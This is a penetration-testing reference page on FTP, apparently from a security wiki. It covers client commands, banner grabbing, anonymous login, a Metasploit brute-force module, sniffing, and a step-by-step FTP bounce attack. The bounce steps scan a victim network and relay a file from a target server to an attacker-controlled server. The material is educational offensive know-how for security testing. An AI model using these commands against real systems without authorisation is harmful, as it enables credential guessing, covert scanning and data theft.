🛠️ FTP

Theory
The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp.
Basic usage
Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.
Command
Description
help
display local help information
get
download file from remote server
put
upload file on the remote server
ascii
set the transfer type to "ASCII"
binary
set the transfer type to "Binary"
close
terminate FTP session
bye
terminate ftp session and exit
When downloading files, users should set the FTP client to "Binary" (binary command) in order to prevent files from becoming corrupted during transit.
Regular text file can be downloaded in the other mode : "ASCII" (ascii command)
Hidden files can be listed with ls -a
Enumeration
Banner grabbing
Useful to get basic information about the FTP server such as its type and version.
1
telnet -vn $IP $PORT
Copied!
Accepted commands
The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.
1
HELP
2
214-The following commands are recognized (* =>'s unimplemented):
3
214-CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
4
214-EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD     
5
214-XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
6
214-NOOP    FEAT    OPTS    AUTH    CCC*    CONF*   ENC*    MIC*    
7
214-PBSZ    PROT    TYPE    STRU    MODE    RETR    STOR    STOU    
8
214-APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST    
9
214-NLST    STAT    SITE    MLSD    MLST    
10
214 Direct comments to [email protected]
11
FEAT
12
211-Features:
13
 PROT
14
 CCC
15
 PBSZ
16
 AUTH TLS
17
 MFF modify;UNIX.group;UNIX.mode;
18
 REST STREAM
19
 MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;
20
 UTF8
21
 EPRT
22
 EPSV
23
 LANG en-US
24
 MDTM
25
 SSCN
26
 TVFS
27
 MFMT
28
 SIZE
29
211 End
Copied!
🛠️ Files
​https://www.howtoforge.com/using-wget-with-ftp-to-download-move-web-sites-recursively​
Connection
Anonymous login
Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.
1
$ ftp $IP $PORT
2
Name: anonymous
3
Password: <nothing>
4
ftp> ls -a # List all files (even hidden) (yes, they could be hidden)
5
ftp> ...
Copied!
Attacks
Brute force
1
msfconsole
2
use auxiliary/scanner/ftp/ftp_login
3
set RHOSTS $IP
4
set RPORT $PORT
5
set USER_FILE $user.txt
6
set PASS_FILE $pass.txt
7
run
Copied!
FTP sniffing
If the FTP communications are not encrypted and if the attacker is on the same network of the client or the server he can sniff the data packet traveling between the client and the server in order to retrieve credential.
Several tools like Wireshark could be used to sniff TCP packets.
FTP Bounce attacks
FTP Bounce attacks let an attacker requests access to ports by using the FTP command PORT. It's mostly used to make a port-scan without being detected (as you are not the one doing it, but the FTP server for you), for D.o.S. attacks, or to download files from another FTP server.
To check if the FTP server is vulnerable to Bounce attacks it is possible to use the tool NMAP.
​https://nmap.org/nsedoc/scripts/ftp-bounce.html​
Scan the victim's network
If a FTP server is vulnerable to Bounce attacks, an attacker could use it to scan its network without being detected.
1
nmap -v -b -P0 'username':'password'@'ftp_server' 'address(es)_to_scan'
Copied!
Download file/folder
If an attacker has access to a bounce FTP server, he can make it request files of other FTP server and download that file to his own server.
Requirements:
Valid credentials in the FTP intermediate server
Valid credentials in target FTP server
Both servers accept the PORT command
Write permissions in the intermediate server
Attacker's FTP server supports passive mode
Steps
Connect to your own FTP server and make the connection passive to make it listen in a directory where the victim service will send the file.
1
#Start server + connection
2
service pure-ftpd start
3
ftp My_IP 21
4
ftp> USER my_own_username
5
#Enable passive mode
6
ftp> pasv
7
Entering Passive Mode (F,F,F,F,X,X) #Note the output (IP and port)
8
#Tells server to accept data and to store it into the dump file
9
ftp> stor dump
Copied!
Create the file to send to the intermediate server with the commands that the targeted server will have to execute. Let's call this file instrs.
1
user ftp   # user and pass of the targeted server
2
pass [email protected]
3
cwd /DIRECTORY
4
type i
5
port F,F,F,F,X,X  #IP and port of the attacker
6
retr file.tar.Z
7
quit
8
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
9
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
10
...
Copied!
The extra nulls at the end of the command file are to fill up the TCP windows and ensure that the command connection stays open long enough for the whole session to be executed.
Upload this file on the intermediate server, then upload it from the intermediate server to the targeted server and __make the targeted machine execute this file. 
1
#Run these commands on the intermediate server
2
put instrs
3
quote "port C,C,C,C,0,21" #IP of the targeted server
4
quote "retr instrs"
Copied!
The attacker should have received on his server the file 'file.tar.Z' renamed as 'dump'. 
Resources
21 - Pentesting FTP
HackTricks
Penetration Testing of an FTP Server
Medium
https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/
www.thesecuritybuddy.com
List of FTP Commands for Linux and UNIX | Serv-U

Systems & services - Previous

Movement

🛠️ SSH

Last modified 5mo ago

Copy link

Contents